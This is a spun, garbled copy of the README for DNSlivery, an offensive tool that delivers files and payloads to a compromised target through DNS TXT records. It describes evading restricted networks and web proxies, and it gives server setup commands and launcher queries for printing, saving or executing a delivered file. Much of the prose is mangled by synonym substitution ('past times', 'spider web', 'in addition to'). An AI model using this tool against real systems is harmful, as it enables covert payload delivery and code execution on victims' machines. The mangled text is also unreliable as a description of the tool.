Dnslivery - Slowly Files Together With Payloads Delivery Over Dns
Easy files in addition to payloads delivery over DNS.
Acknowledgments
This projection has been originally inspired past times PowerDNS in addition to Joff Thyer's technical segment on the Paul's Security Weekly podcast #590 (youtu.be/CP6cIwFJswQ).
Description
TL;DR
DNSlivery allows delivering files to a target using DNS equally the carry protocol.
Features:
- allows to print, execute or salve files to the target
- does non require whatever customer on the target
- does non require a full-fledged DNS server
What work are y'all trying to solve?
Easily deliver files and/or payloads to a compromised target where classic spider web delivery is non possible in addition to without the take away for a dedicated customer software. This applies to restricted environments where outgoing spider web traffic is forbidden or precisely inspected past times a curious spider web proxy.
Even though to a greater extent than consummate DNS tunneling tools already be (s.a. dnscat2 in addition to iodine), they all require to run a dedicated customer on the target. The work is that in that place is in all probability no other agency in addition to hence DNS to deliver the customer inwards such restricted environments. In other words, edifice a DNS communication channel amongst these tools require to already get got a DNS communication channel.
In comparison, DNSlivery exclusively provides one-way communication from your server to the target but does non require whatever dedicated customer to practise so. Thus, if y'all take away to construct a reliable two-way communication channel over DNS, run DNSlivery to deliver the customer of a to a greater extent than advanced DNS tunneling tool to your target.
How does it work?
Just similar close DNS tunneling tools, DNSlivery uses
TXT records to shop the content of files inwards their base64 representation. However, it does non require to setup a full-fledged DNS server to work. Instead, it uses the scapy library to psyche for incoming DNS packets in addition to arts and crafts the desired response.
As close files practise non jibe inwards a unmarried
TXT record, DNSlivery volition practise multiple ordered records containing base64 chunks of the file. As an example, the inwards a higher house diagram illustrates the delivery of the 42nd chunk of the file named file.In guild to hollo back all base64 chunks in addition to pose them dorsum together without the take away for a dedicated customer on the target, DNSlivery volition generate for every file:
- a unproblematic cleartext launcher
- a reliable base64 encoded stager
This two-stages delivery procedure is required to add together features to the stager (s.a. treatment lost DNS responses) that would otherwise non jibe inwards a unmarried
TXT record.Note on target compatibility
Currently, exclusively PowerShell targets are supported. However, DNSlivery could hold upwardly improved to back upwardly additional targets such equally bash or python. Please allow me know @no0be if this is a characteristic that y'all would similar to encounter existence implemented.
Requirements
DNSlivery does non require to construct a complex server infrastructure. In fact, in that place are exclusively 2 unproblematic requirements:
- be able to practise a
NStape inwards your world DNS zone - have a Linux server capable of receiving
udp/53traffic from the Internet
Setup
DNS Zone
The outset stride is to delegate a sub-domain to the server that volition run DNSlivery past times creating a novel
NS tape inwards your domain. As an example, I created the next tape to delegate the sub-domain dnsd.no0.be to the server at vps.no0.be.dnsd IN NS vps.no0.be.NS record.DNSlivery
The exclusively requirements to run DNSlivery are
python3 in addition to its scapy library.git clone https://github.com/no0be/DNSlivery.git && cd DNSlivery pip install -r requirements.txtUsage
Server
DNSlivery volition serve all files of a given directory (
pwd past times default) in addition to needs to hold upwardly run amongst root privileges to psyche for incoming udp/53 packets.usage: dnslivery.py [-h] [-p PATH] [-s SIZE] [-v] interface domain nameserver DNSlivery - Easy files in addition to payloads delivery over DNS positional arguments: interface interface to psyche to DNS traffic domain FQDN advert of the DNS zone nameserver FQDN advert of the server running DNSlivery optional arguments: -h, --help demo this assist message in addition to locomote out -p PATH, --path PATH path of directory to serve over DNS (default: pwd) -s SIZE, --size SIZE size inwards bytes of base64 chunks (default: 255) -v, --verbose increase verbosity$ sudo python3 dnslivery.py eth0 dnsd.no0.be vps.no0.be -p /tmp/dns-delivery DNSlivery - Easy files in addition to payloads delivery over DNS [*] File "file" ready for delivery at file.dnsd.no0.be (7 chunks) [*] Listening for DNS queries...Note on filename normalization
As the charset allowed for domain names is much to a greater extent than restrictive than for UNIX filenames (per RFC1035), DNSlivery volition perform normalization when required.
Example:
[*] File "My Awesome Powershell Script ;).ps1" ready for delivery at my-awesome-powershell-script----ps1.dnsd.no0.be (1891 chunks)Target
On the target, start past times retrieving the launcher of the desired file past times requesting its dedicated
TXT record. The next 3 launchers are supported:| Action | Launcher | Description |
|---|---|---|
[filename].print.[domain] | (Default) Print the delivered file to the console | |
| Execute | [filename].exec.[domain] | Execute the delivered file (useful for scripts) |
| Save | [filename].save.[domain] | Save the delivered file to disk (useful for binaries) |
nslookup -type=txt [filename].[stager].[domain]Example:
